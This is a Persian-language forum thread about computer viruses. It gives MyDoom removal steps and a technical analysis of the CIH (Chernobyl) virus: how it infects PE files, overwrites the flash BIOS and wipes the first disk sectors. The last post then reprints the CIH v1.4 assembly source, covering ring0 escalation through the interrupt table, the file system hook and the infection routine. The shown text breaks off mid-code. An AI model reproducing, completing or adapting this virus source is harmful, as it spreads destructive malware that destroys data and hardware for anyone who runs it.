شما بايد تعاريف را از وب سايت Symantec security response دانلود كنيد و به طور دستي آنها را نصب كنيد.
3. Restartكردن كامپيوتر در VGA mode safe mode :
كامپيوتر را shut down و power را خاموش كنيد.
حداقل 30 ثانيه منظر شويد و آنگاه كامپيوتر را در Safe mode يا VGA mode Restart كنيد.
كاربران Windows 95 , 98 , Me , 2000 يا Xp كامپيوتر را در Safe mode Restart , كنند.
كاربران Windows NT كامپيوتر را VGA mode ، Restart كنند.
4.اسكن كردن براي حذف فايل هاي آلوده:
برنامه آنتي ويروس سيمانتيك تان را شروع كنيد و مطمئين شويد كه آن براي اسكن كردن همه فايل ها شكل گرفته است.
System scan (a را به طور كامل اجرا كنيد.
(b اگر فايلي با ويروس My doom آلوده شد و نمايان شد ان را حذف كنيد.
5. حذف كردن مقادیراز:Registry
a) روي Start كليك كنيد و آنگاه روي Run كليك كنيد.
b) regeditرا تايپ كنيد انگاه روي OK كليك كنيد.
c) هدايت كنيد هر يك از اين كليد هارا.
HKEY _LOCAL_MACHINE_SOFTWARE\Microsoft \windows current version\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\windows current
d)ازRegistry editor خارج شويد.

فصل چهارم-آنالیزويروس CIH Chernoble
4-1-بررسی وعملکرد ویروس CIH
از آنجاييكه شروع تكنولوژي BIOS فلش در كامپيوتر هاي روميزي بوده است امكان حمله بدخيم به BIOSدر صنعت ايمني كامپيوتر شناسايي شده است اولين ويروسي كه موفق شد به اين روش به كامپيوتر هاي خانگي حمله كند و قبلا نا شناخته بود از طريق شبكه جهاني منتشر شد.در ژوئن امسال فايلي از طرف يك مشتري دريافت شد كه آلوده به يك آلوده كننده قابل حمل (PE) جديد بود كه CIH نام گرفته و تحت ويندوز 98 كار مي كند و حداقل 4گونه شناخته شده دارد كه به نام هاي '1.2V '، V1.4 'و 2مورد خودشناخته به نام'V1.3' هستند اگر چه ويندوز NT نيز از فايل هاي PE استفاده مي كنداما CIH از مكانيزمي بهره مي برد كه تحت NTكار نمي كند.
گونه هاي اين ويروس payload حداكثر مشخص دارند و فقط در چند بايت با هم متفاوت هستند.
و چند روز رها سازي 26آوريل ، 26 ژوئن و 26 هر ماه دارد بمحض شناسايي، ويروس در تايوان گسترش يافته شده بود و آنجا به عنوان منشاء اين ويروس شناخته شد و در چند كشور ديگر نيز گسترش يافت. ]گزارش گسترش آن از استرليا، چين، فرانسه، آلمان، كره، نروژ، روسيه ، برتانيا و ايالات متحده دريافت شد[.
هرماشيني كه از يكي از چندين پنيوم ارزان رايج و چيپ BIOS فلش يكي از 2 سازنده ان استفاده ميكند مستعد حمله به خود BIOS است و در ماشين هاي آسيب پذير بخش كوچك اما حياتي از BIOS با CIH جانویسي شده و PC را غير خود راه انداز مي كند اين مدت زيادي نيست كه يك از بين برنده ديسك عادي شده است.
اگر چه جزئيات تكنيكي مكانيسم سرايت CIH براي تحقيق ويروس بيان شده است،اما payloadمفيد آن متفاوت با ديگر ويروس ها تنظيم شده است.اين payload از دو قسمت تشكيل شده است كه هر دو اگر شرايط صحيحي برقرار باشد راه اندازي می شود. از آنجائيكه payload بخشي از مكانيسم الودگی است تازمانیکه ويروس در حافظه مقیم است راه اندازي نمي شود.
شرايط راه اندازي وقتي كه فايل پسوند EXE داشته باشد،برقرار مي شود.
بخش دوم payload،قسمتي عادي است و اولين 2048 بخش هر هارد ديسك را در سيستم با ديتاي تصادفي در حافظه جانویسي مي كند.هر چيزي كه به اين روش جانویسي شود به سختی بازيابي مي شوند و يا بازيابي آن ممكن نيست.ويروس بدنبال ديسك هاي بيشتری به طور نامحدود مي گردد و اين ماشين – بجز هارد ديسك كه پيوسته در حال اجرا است – پاسخگو به ورودي اطلاعات كاربر نيست.
تكنولوژي هاي EPROM قبلي امكان برنامه ريزي مجدد را به Bios داده اما نياز است تا چيپ برداشته شده و تحت نور ماورا بنفش پاك شده و در سخت افزار اختصاصي دوباره برنامه ريزي شود تكنولوژي Flooh ROM به اين معني است كه بروز رساني Bios و تثبيت خطا راحت تر و ارزان تر مي تواند انجام گيرد و اين كار توسط كاربر بدون نياز به مهارت خاص يا تجهيزاتي ممكن است.خطرات امكان دادن به نرم افزار براي بازنويسي بخش هاي اصلي كد خود راه انداز داخلي ماشين مورد بحث قرار گرفته است اما تا كنون هيچ ويروسي نتوانسته چنين آسيبي وارد كند.
محتمل ترين دليل براي نبود قبلي چنين payload،پيچيدگي اين وظيفه بوده است . براي نوشتن مستقيم و موفق در Bios ،دانستن جزئيات چيپ مادربورد و Bios Flash Rom لازم است.Flash Rom استفاده شده براي ذخيره Bios به طور نرمال يك مكانيسم تو كار براي جلوگيري از نوشتن تصادفي درآن توسط نورهاي الكترونيكي در هنگام روشن يا خاموش كردن يا نوسانات برق خواهد داشت.
بنابراين براي نوشتن مستقيم در Bios يك برنامه بايد در Flash ROM و چيپ مادر بورد دسترسي به نوشتن داشته باشد و سپس از حفاظت خود چيپ ناتوان مي شود اطلاعات مورد نياز براي اين كار براحتي از سازنده چيپ در دسترس قرار ميگيرد براي قادر شدن به نوشتن مجدد Flash Rom يك ولتاژ برنامه ريزي يا UPP عموما 5v يا 12v لازم است.اين ولتاژ اغلب توسط يك وصل كننده در مادر بورد تنظيم مي شود با اين وجود براي تحصيل بروز رساني Bios ماشين هاي زيادي داراي ولتاژ نوشتن هستند اما Bios ندارند.
CIH متداول براي دستيابي مستقيم به چيپ Bios استفاده مي شود كه با مجموعه چيپ TX430 كاري مي كند،اما احتمالا با بيشتر پنيوم ها و نه همه آنها كار مي كند برخي مجموعه چيپ هاي اواخر مدل 486 نيز ممكن است آسيب پذير باشند رشته برنامه ريزي هاي ارسال شده به خود Bios امكان نوشتن در حداقل ROM2از سازنده هاي نختلف را مي دهد آسيب واردامده با نوشتن يك بايت در بلوك بوت Biosاست – ناحيه اي كه داراي كد براي تست هاي اوليه سخت افزار و خود راه انداز ماشين مي باشد.
بر خلاف بسياري RAM ها ، Flash RAM در قطعات دلخواه نوشته نمي شود بسياري ROM را اندازه صفحه 128 بايت براي بلوك هاي بوت خود دارند بنابراين اگر چه CIH فقط يك بايت را مي نويسد 12 بايت اطراف آن به FFh ريست مي شوند.وقتي ماشين بعدي راه اندازي مي شود،بلوك بوت )راه انداز( Bios جديد نصب شود ماشين را از كار
مي اندازد در موارديكه چیپ به مادر برد لحيم شده است،بدون اينكه با سوكت وصل شود،تغيير مادر بورد احتمالا لازم خواهد بود.
4-2-مکانیسم آلودگی
فايلي هاي PE استفاده شده در ويندوز 98 و ويندوز NT قابل اجرا هستند يك فايل PE از يك DOS قابل اجرا تشكيل شده است كه معمولا يك برنامه كوتاه مي باشد كه نشان مي دهد اين برنامه تحت ويندوز بخش سرانداز PE و چندين مورد ديتا به اجرا درآيد.اين موارد مي تواند داراي كد اجرايي اطلاعات توابع وارد شده يا خارج شده دیتا يا اطلاعات جابجا سازي باشد.هر مورد بدنبال سرانداز PE در يك فايل رديف شود تا در حاشيه اي شروع شود كه بين 512 بايت و 64KB باشد.
هرگونه،تفاوت بین طول کد استفاده شده یا دیتا دریک مورد و ردیف بخش انتخابی به طور نرمال با موارد خنثی بوسیله اتصال دهنده در میان قرار گرفته است.اطلاعات روی ردیف این موارد و اندازه هر مورد در سر انداز PE در یک سری جداول دقیقاً پس از سرانداز ذخیره شده است.فایل های معمول PEدارای 5 یا 6 مورد می باشند که همه آنها فضایی دارند که به طور چشمگیری اشغال شده است. این در نواحی واقع شده است که CIH که خود را ذخیره می کند، بنابراین فایل را بدون افزایش طول آن آلوده می کند.آلوده کننده های فضای خالی که بصورت حفره ای در یک فایل بزرگ دیده می شوند کل ویروس را نگه می دارند و جدید نیستند،در حقیقت Lehigh یکی از اولین آلوده کننده های فایل،دقیقاً از این تکنیک استفاده کرده است.با این وجود،CIH تعداد بیشتری فایل را در بر می گیرد که به طور بالقوه آسیب پذیر هستند.


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:07 AM
ارسال: #23
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
CIHکه آنها را در قطعه ای که برای پر کردن فضای جا افتاده در انتهای بخش های میزبان آن استفاده می شود،می شکند.و برای فایل های،فضای جا افتاده ناکافی بررسی می شود تا آلودگی آنها انجام شود. با این وجود،تمام گونه های شناخته شده فقط تحت 1KB طول کار می کند و بیشتر PE با حداقل آن فضای اضافی آزاد را دارند ویژگی اتصال دهنده Borland این است که فایل های ایجاد شده توسط آن آسیب پذیر نیستند.در هنگام آسیب دیدن یک فایل،CIH جدولی از دیتا در مورد طول و محل قطعات کدآن می سازد.این و کد کوچکتر مختص حافظه برای خودوبرای قطعه ای که قطعات کدان با هم بر میگردد،بین سر انداز PE و اولین مورد از میزبان ذخیره شده است. اگر فضای ناکافی در سر انداز برای گرفتن این دیتای تعیین کننده و کد باشد،این فایل نیز بنظر غیر آسیب پذیر می رسد.
CIH
نام مستعار: PE_CIH,CIH Spacefiller , Win95/CIH. گونه‌هاي 3001 و 1019 بايتي و 2 تا 1010 بايستي شناسايي شده است.
نوع: آلوده كننده حفره تقسيم شده از فضاي وقفه بخش PE استفاده مي‌كند.
آلودگي: به API سيستم فايل ويندوز 98 قلاب انداخته است.
راه‌انداز: باز نمودن يك فايل EXE غير قابل آلوده شدن در 26 آوريل (CIH 1003, CIH 1010,A)، 26 ژوئن (CIH,1010B) يا در 26 هر ماه (CIH, (1019.

4-3- هشدار ويروس win 32/ CIH
نكته مهم: هر شخصي كه از ويندوز 95 يا 98 مايكروسافت استفاده مي‌كند،بايد توجه كنیددر اين ماه ژوئن ويروس جديدي بنام (PE_CIH يا) Win 32/CIH ظاهر شد و در جولاي در ماشين‌هاي فضاي باز كشف شد.اين ويروس فايل‌هاي قابل اجرا در ويندوز 95 يا 98 (با فرمت PE) را آلوده مي‌كند اما به فايل‌هاي ويندوز NT يا كامپيوتر Macintosh كاري ندارد.
ويروس‌هاي win 32/ CIH بدنه كد ويروس را مي‌شكند و در قسمت‌هاي استفاده نشده فايل آلوده شده قرار مي‌گيرد.اين ويروس‌ها داراي كدهاي مخرب شديدي هستند كه در 26 هر ماه رها مي‌شود، زمانيكه كه ويروس تلاش در جانويسي flash Blos در ماشين‌هاي آلوده شده مي‌كند.اگر flash Blos قادر به نوشتن باشد (و بيشتر كامپيوترهاي مدرن داراي flash- Blos هستند)، جانويسي ماشين را غير قابل استفاده مي‌كند چون راه‌انداز طولاني‌تري ندارد.هر سخت‌افزاري كه با اين ويروس آسيب ببيند تحت گارانتي سازنده پوشش نمي‌يابدواطلاعات قسمت‌هاي ديسك تخريب مي‌شود.
در جولاي ويروس win32/CIH در يك آزمايش با استفاده از سيستم ويندوز 95 رها شد.پس از اينكه تاريخ كامپيوتر به 26 جولاي رسيد، تمام اطلاعات قسمت‌هاي ديسك از بين رفت و سيستم غير قابل راه‌اندازي شد،‌و اين ديگر قابل بازيابي نبودند.ابزار كمك به ذخيره اطلاعات از دست رفته وجو ندارد اما محققين در حال جستجو هستند.
4-4-نتيجه‌گيري
اگر چه از لحاظ تكنيكي اين ويروس تنها به نرم افزار ثابت BIOS آسيب مي‌رساند،نتيجه نهايي اين است كه تثبيت آسيب آن نيازمند برخي اشكال جايگزيني سخت‌افزاري است. CIH اثر مشابهي با ويروس آسيب رساننده به سخت‌افزار دارد و اين اولين آنها نيست.


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:08 AM
ارسال: #24
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
4-5-سورس کد ویروسCIH
کد:
; ****************************************************************************
; *            The Virus Program Information                        *
; ****************************************************************************
; *                                                                          *
; *    Designer : CIH            Source : TTIT of TATUNG in Taiwan    *
; *    Create Date : 04/26/1998    Now Version : 1.4                    *
; *     Modification Time : 05/31/1998                                       *
; *                                         *
; *    Turbo Assembler Version 4.0    : tasm /m cih                 *
; *    Turbo Link Version 3.01        : tlink /3 /t cih, cih.exe         *
; *                                         *
; *==========================================================================*
; *            Modification History                                 *
; *==========================================================================*
; *    v1.0    1. Create the Virus Program.                                 *
; *        2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *        4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *        5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *        6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *        7. It is also Infected, even the File is Read-Only.          *
; *        8. When the File is Infected, the Modification Date and Time *
; *           of the File also don't be Changed.                        *
; *        9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *           Previous FileSystemApiHook, it will Call the Function     *
; *           that the IFS Manager Would Normally Call to Implement     *
; *           this Particular I/O Request.                              *
; *           10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; *    v1.1    1. Especially, the File that be Infected will not Increase   *
; *           it's Size...   ^__^                         *
; * 05/15/1998    2. Hook and Modify Structured Exception Handing.         *
; *           When Exception Error Occurs, Our OS System should be in   *
; *           Windows NT. So My Cute Virus will not Continue to Run,    *
; *           it will Jmup to Original Application to Run.             *
; *        3. Use Better Algorithm, Reduce Virus Code Size.         *
; *        4. The Virus "Basic" Size is only 796 Bytes.             *
; *==========================================================================*
; *    v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *        2. Modify the Bug of v1.1                     *
; * 05/21/1998    3. The Virus "Basic" Size is 1003 Bytes.             *
; *==========================================================================*
; *    v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *           So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998    2. The Virus "Basic" Size is 1010 Bytes.             *
; *==========================================================================*
; *    v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *        2. Change the Date of Killing Computers.             *
; * 05/31/1998    3. Modify Virus Version Copyright.                 *
; *        4. The Virus "Basic" Size is 1019 Bytes.             *
; ****************************************************************************

                .586P

; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        dd    00000000h, VirusSize

OriginalAppEXE  ENDS

; ****************************************************************************
; *                     My Virus Game                                        *
; ****************************************************************************

; *********************************************************
; *                    Constant Define                    *
; *********************************************************

TRUE            =    1
FALSE            =    0

DEBUG            =    TRUE

MajorVirusVersion    =    1
MinorVirusVersion    =    4

VirusVersion        =    MajorVirusVersion*10h+MinorVirusVersion


IF    DEBUG

    FirstKillHardDiskNumber    =    81h
    HookExceptionNumber     =       05h

ELSE

    FirstKillHardDiskNumber    =    80h
    HookExceptionNumber     =       03h

ENDIF


FileNameBufferSize    =    7fh

; *********************************************************
; *********************************************************

VirusGame               SEGMENT

                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; *             Ring3 Virus Game Initial Program          *
; *********************************************************

MyVirusStart:
            push    ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************

            lea    eax, [esp-04h*2]

            xor    ebx, ebx
            xchg    eax, fs:[ebx]

            call    @0
@0:
            pop    ebx

            lea    ecx, StopToRunVirusCode-@0[ebx]
            push    ecx

            push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************

            push    eax        ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;

                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0

            cli

                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point

                        lea     esi, MyExceptionHook-@1[ecx]

            push    esi

            mov    [ebx-04h], si        ;
            shr    esi, 16            ; Modify Exception
            mov    [ebx+02h], si        ; Entry Point Address

            pop    esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

            int    HookExceptionNumber    ; GenerateException
ReturnAddressOfEndException    =    $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

            push    esi
            mov    esi, eax

LoopOfMergeAllVirusCodeSection:

            mov    ecx, [eax-04h]

            rep    movsb

            sub    eax, 08h

            mov    esi, [eax]

            or    esi, esi
            jz    QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

            jmp    LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

            pop    esi

; *************************************
; * Generate Exception Again          *
; *************************************

            int    HookExceptionNumber    ; GenerateException Again

; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************

ReadyRestoreSE:
            sti

            xor    ebx, ebx

            jmp    RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode:
@1            =    StopToRunVirusCode

            xor    ebx, ebx
            mov    eax, fs:[ebx]
            mov    esp, [eax]

RestoreSE:
            pop    dword ptr fs:[ebx]
            pop    eax

; *************************************
; * Return Original App to Execute    *
; *************************************

            pop    ebp

                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint    =    $-4    ; App Entry Point to Stack

                        ret     ; Return to Original App Entry Point

; *********************************************************
; *             Ring0 Virus Game Initial Program          *
; *********************************************************

MyExceptionHook:
@2            =    MyExceptionHook

            jz    InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

            mov    ecx, dr0
            jecxz    AllocateSystemMemoryPage

            add    dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************

ExitRing0Init:
            mov    [ebx-04h], bp    ;
            shr    ebp, 16        ; Restore Exception
            mov    [ebx+02h], bp    ;

            iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

            mov    dr0, ebx    ; Set the Mark of My Virus Exist in System

            push    00000000fh    ;
            push    ecx        ;
            push    0ffffffffh    ;
            push    ecx        ;
            push    ecx        ;
            push    ecx        ;
            push    000000001h    ;
            push    000000002h    ;
            int    20h        ; VMMCALL _PageAllocate
_PageAllocate        =    $        ;
            dd    00010053h    ; Use EAX, ECX, EDX, and flags
            add    esp, 08h*04h

            xchg    edi, eax    ; EDI = SystemMemory Start Address

            lea    eax, MyVirusStart-@2[esi]

            iretd    ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************

InstallMyFileSystemApiHook:

            lea    eax, FileSystemApiHook-@6[edi]

            push    eax  ;
            int    20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook    =    $    ;
            dd      00400067h    ; Use EAX, ECX, EDX, and flags

            mov    dr0, eax    ; Save OldFileSystemApiHook Address

            pop    eax    ; EAX = FileSystemApiHook Address

            ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
            mov    ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
            mov    edx, [ecx]
            mov    OldInstallFileSystemApiHook-@3[eax], edx

            ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
            lea    eax, InstallFileSystemApiHook-@3[eax]
            mov    [ecx], eax

            cli

            jmp    ExitRing0Init

; *********************************************************
; *             Code Size of Merge Virus Code Section     *
; *********************************************************

CodeSizeOfMergeVirusCodeSection        =    offset $

; *********************************************************
; *             IFSMgr_InstallFileSystemApiHook           *
; *********************************************************

InstallFileSystemApiHook:
            push    ebx

            call    @4    ;
@4:                    ;
            pop    ebx    ; mov ebx, offset FileSystemApiHook
            add    ebx, FileSystemApiHook-@4    ;

            push    ebx
            int    20h  ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook    =    $
            dd      00400068h    ; Use EAX, ECX, EDX, and flags
            pop    eax

            ; Call Original IFSMgr_InstallFileSystemApiHook
            ; to Link Client FileSystemApiHook
            push    dword ptr [esp+8]
            call    OldInstallFileSystemApiHook-@3[ebx]
            pop    ecx

            push    eax

            ; Call Original IFSMgr_InstallFileSystemApiHook
            ; to Link My FileSystemApiHook
            push    ebx
            call    OldInstallFileSystemApiHook-@3[ebx]
            pop    ecx

            mov    dr0, eax    ; Adjust OldFileSystemApiHook Address

            pop    eax

            pop    ebx

            ret

; *********************************************************
; *            Static Data                       *
; *********************************************************

OldInstallFileSystemApiHook    dd    ?

; *********************************************************
; *             IFSMgr_FileSystemHook                     *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************

FileSystemApiHook:
@3            =    FileSystemApiHook

            pushad

                        call    @5    ;
@5:                    ;
                        pop     esi    ; mov esi, offset VirusGameDataStartAddress
                        add     esi, VirusGameDataStartAddress-@5

; *************************************
; * Is OnBusy !?                      *
; *************************************

            test    byte ptr (OnBusy-@6)[esi], 01h    ; if ( OnBusy )
            jnz    pIFSFunc            ; goto pIFSFunc

; *************************************
; * Is OpenFile !?                    *
; *************************************

            ; if ( NotOpenFile )
            ; goto prevhook
            lea    ebx, [esp+20h+04h+04h]
            cmp    dword ptr [ebx], 00000024h
            jne    prevhook

; *************************************
; * Enable OnBusy                     *
; *************************************

            inc    byte ptr (OnBusy-@6)[esi]    ; Enable OnBusy

; *************************************
; * Get FilePath's DriveNumber,       *
; * then Set the DriveName to         *
; * FileNameBuffer.                   *
; *************************************
; * Ex. If DriveNumber is 03h,        *
; *     DriveName is 'C:'.            *
; *************************************

            ; mov esi, offset FileNameBuffer
            add    esi, FileNameBuffer-@6

            push    esi

            mov    al, [ebx+04h]
            cmp    al, 0ffh
            je    CallUniToBCSPath

            add    al, 40h
            mov    ah, ':'

            mov    [esi], eax

            inc    esi
            inc    esi

; *************************************
; * UniToBCSPath                      *
; *************************************
; * This Service Converts             *
; * a Canonicalized Unicode Pathname  *
; * to a Normal Pathname in the       *
; * Specified BCS Character Set.      *
; *************************************

CallUniToBCSPath:
            push    00000000h
            push    FileNameBufferSize
            mov    ebx, [ebx+10h]
            mov    eax, [ebx+0ch]
            add    eax, 04h
            push    eax
            push    esi
            int    20h    ; VXDCall UniToBCSPath
UniToBCSPath        =    $
            dd    00400041h
            add    esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !?             *
; *************************************

            ; cmp [esi+eax-04h], '.EXE'
            cmp    [esi+eax-04h], 'EXE.'
            pop    esi
            jne    DisableOnBusy

IF    DEBUG

; *************************************
; * Only for Debug                    *
; *************************************

            ; cmp [esi+eax-06h], 'FUCK'
            cmp    [esi+eax-06h], 'KCUF'
            jne    DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !?          *
; *************************************

            ; if ( NotOpenExistingFile )
            ; goto DisableOnBusy
            cmp    word ptr [ebx+18h], 01h
            jne    DisableOnBusy

; *************************************
; * Get Attributes of the File        *
; *************************************

            mov    ax, 4300h
            int    20h    ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO    =    $
            dd    00400032h

            jc    DisableOnBusy

            push    ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address   *
; *************************************

            mov    edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
            mov    edi, [edi]

; *************************************
; * Is Read-Only File !?              *
; *************************************

            test    cl, 01h
            jz    OpenFile

; *************************************
; * Modify Read-Only File to Write    *
; *************************************

            mov    ax, 4301h
            xor    ecx, ecx
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File                         *
; *************************************

OpenFile:
